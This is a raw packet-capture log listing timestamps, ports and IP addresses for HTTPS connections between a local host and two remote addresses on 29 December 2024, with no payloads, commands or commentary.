Dec 29, 2024 09:23:29.638355970 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.638360977 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.638386011 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.638411045 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.643119097 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.643146992 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.643196106 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.643207073 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.643235922 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.643249035 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.680890083 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.680912971 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.680989027 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.681025028 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.681525946 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.780906916 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.780932903 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.781022072 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.781053066 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.781392097 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.786221981 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.786238909 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.786294937 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.786302090 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.786345959 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.791686058 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.791702032 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.791769981 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.791775942 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.791809082 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.829133987 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.829159975 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.829221010 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.829255104 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.829272032 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.829296112 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.834764004 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.834780931 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.834842920 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.834849119 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.835078955 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.839504004 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.839520931 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.839703083 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.839709997 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.840002060 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.844854116 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.844873905 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.844932079 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.844938993 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.844974995 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.844983101 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.881484985 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.881503105 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.881572008 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.881581068 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.881706953 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.982290030 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.982317924 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.982372046 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.982423067 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.982443094 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.982567072 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.987554073 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.987571001 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.987627983 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.987653971 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.987668991 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.987705946 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.993081093 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.993096113 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.993256092 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:29.993279934 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:29.993398905 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.030503988 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.030529022 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.030586004 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.030633926 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.030652046 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.030747890 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.036019087 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.036036968 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.036087036 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.036108017 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.036257982 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.040802956 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.040818930 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.040872097 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.040894985 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.040910006 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.041039944 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.046284914 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.046303034 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.046341896 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.046371937 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.046385050 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.046410084 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.083580971 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.083607912 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.083645105 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.083678961 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.083693981 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.083766937 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.184091091 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.184118032 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.184168100 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.184195995 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.184209108 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.184237003 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.188915968 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.188934088 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.189003944 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.189009905 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.189054966 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.194322109 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.194339037 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.194374084 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.194380045 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.194403887 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.194420099 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.231865883 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.231889963 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.231930971 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.231954098 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.231970072 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.232062101 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.237526894 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.237554073 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.237598896 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.237605095 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.237639904 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.237647057 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.242412090 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.242429972 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.242469072 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.242474079 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.242506981 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.242512941 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.248045921 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.248109102 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.248150110 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.248155117 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.248164892 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.248204947 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.285018921 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.285048962 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.285145044 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.285162926 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.285260916 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.385181904 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.385219097 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.385252953 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.385265112 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.385292053 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.385324001 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.388254881 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.388329983 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.388333082 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:30.388382912 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:30.391283989 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:25:05.003349066 CET	49931	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:05.003420115 CET	443	49931	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:05.003516912 CET	49931	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:05.004447937 CET	49931	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:05.004484892 CET	443	49931	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:06.266109943 CET	443	49931	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:06.266211033 CET	49931	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:06.267944098 CET	49931	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:06.267966986 CET	443	49931	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:06.268645048 CET	443	49931	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:06.327697039 CET	49931	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:06.327697039 CET	49931	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:06.327800989 CET	443	49931	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:07.120043039 CET	443	49931	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:07.120120049 CET	443	49931	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:07.120187998 CET	49931	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:07.122258902 CET	49931	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:07.122303963 CET	443	49931	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:07.122332096 CET	49931	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:07.122351885 CET	443	49931	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:07.130497932 CET	49936	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:07.130544901 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:07.130706072 CET	49936	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:07.131552935 CET	49936	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:07.131584883 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:08.457587957 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:08.457698107 CET	49936	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:08.458885908 CET	49936	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:08.458910942 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:08.459198952 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:08.460578918 CET	49936	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:08.460578918 CET	49936	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:08.460660934 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.370682001 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.370732069 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.370764017 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.370794058 CET	49936	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:10.370799065 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.370855093 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.370893955 CET	49936	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:10.370912075 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.370946884 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.370970011 CET	49936	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:10.370986938 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.371042967 CET	49936	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:10.379160881 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.387896061 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.387991905 CET	49936	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:10.388011932 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.485738993 CET	49936	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:10.485761881 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.581046104 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.581099987 CET	49936	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:10.581120968 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.584880114 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.584939957 CET	49936	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:10.584954023 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.592540026 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.592597961 CET	49936	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:10.592611074 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.592631102 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.592696905 CET	49936	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:10.594362020 CET	49936	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:10.594362020 CET	49936	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:10.594394922 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.594418049 CET	443	49936	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.727902889 CET	49945	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:10.727931023 CET	443	49945	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:10.728046894 CET	49945	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:10.728334904 CET	49945	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:10.728348017 CET	443	49945	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:11.939533949 CET	443	49945	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:11.939595938 CET	49945	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:11.940634966 CET	49945	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:11.940644026 CET	443	49945	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:11.940846920 CET	443	49945	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:11.941811085 CET	49945	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:11.941922903 CET	49945	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:11.941956043 CET	443	49945	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:13.084811926 CET	443	49945	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:13.084884882 CET	443	49945	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:13.084950924 CET	49945	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:13.085124016 CET	49945	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:13.085135937 CET	443	49945	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:13.102976084 CET	49951	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:13.103024960 CET	443	49951	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:13.103128910 CET	49951	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:13.103375912 CET	49951	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:13.103390932 CET	443	49951	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:14.357631922 CET	443	49951	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:14.357821941 CET	49951	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:14.358927011 CET	49951	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:14.358939886 CET	443	49951	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:14.359141111 CET	443	49951	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:14.360318899 CET	49951	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:14.360475063 CET	49951	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:14.360508919 CET	443	49951	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:14.360559940 CET	49951	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:14.403371096 CET	443	49951	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:15.264241934 CET	443	49951	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:15.264323950 CET	443	49951	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:15.264380932 CET	49951	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:15.296211958 CET	49951	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:15.296236038 CET	443	49951	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:15.387056112 CET	49957	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:15.387160063 CET	443	49957	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:15.387264013 CET	49957	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:15.387574911 CET	49957	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:15.387603998 CET	443	49957	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:16.688525915 CET	443	49957	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:16.688616991 CET	49957	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:16.689707994 CET	49957	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:16.689740896 CET	443	49957	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:16.689980984 CET	443	49957	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:16.691103935 CET	49957	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:16.691227913 CET	49957	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:16.691276073 CET	443	49957	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:16.691369057 CET	49957	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:16.691385984 CET	443	49957	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:17.678864002 CET	443	49957	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:17.678951025 CET	443	49957	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:17.679012060 CET	49957	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:17.679358006 CET	49957	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:17.679385900 CET	443	49957	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:17.962457895 CET	49965	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:17.962485075 CET	443	49965	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:17.962537050 CET	49965	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:17.962898970 CET	49965	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:17.962910891 CET	443	49965	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:19.173194885 CET	443	49965	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:19.173274994 CET	49965	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:19.174841881 CET	49965	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:19.174850941 CET	443	49965	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:19.175076008 CET	443	49965	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:19.176187992 CET	49965	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:19.176290035 CET	49965	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:19.176295996 CET	443	49965	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:20.029223919 CET	443	49965	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:20.029326916 CET	443	49965	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:20.029386044 CET	49965	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:20.029464960 CET	49965	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:20.029475927 CET	443	49965	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:20.065660000 CET	49969	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:20.065686941 CET	443	49969	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:20.065773964 CET	49969	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:20.065989971 CET	49969	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:20.066000938 CET	443	49969	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:21.274494886 CET	443	49969	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:21.274570942 CET	49969	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:21.295793056 CET	49969	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:21.295829058 CET	443	49969	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:21.296013117 CET	443	49969	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:21.297324896 CET	49969	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:21.297513008 CET	49969	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:21.297521114 CET	443	49969	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:22.289128065 CET	443	49969	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:22.289217949 CET	443	49969	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:22.289278030 CET	49969	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:22.291261911 CET	49969	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:22.291286945 CET	443	49969	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:22.298074007 CET	49975	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:22.298096895 CET	443	49975	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:22.298156977 CET	49975	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:22.298696041 CET	49975	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:22.298703909 CET	443	49975	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:23.555779934 CET	443	49975	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:23.555990934 CET	49975	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:23.557251930 CET	49975	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:23.557257891 CET	443	49975	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:23.557476044 CET	443	49975	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:23.558665991 CET	49975	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:23.558686972 CET	49975	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:23.558720112 CET	443	49975	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:24.358697891 CET	443	49975	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:24.358763933 CET	443	49975	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:24.358807087 CET	49975	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:24.360002995 CET	49975	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:24.360013008 CET	443	49975	104.21.80.1	192.168.2.5
Dec 29, 2024 09:25:24.360022068 CET	49975	443	192.168.2.5	104.21.80.1
Dec 29, 2024 09:25:24.360028028 CET	443	49975	104.21.80.1	192.168.2.5
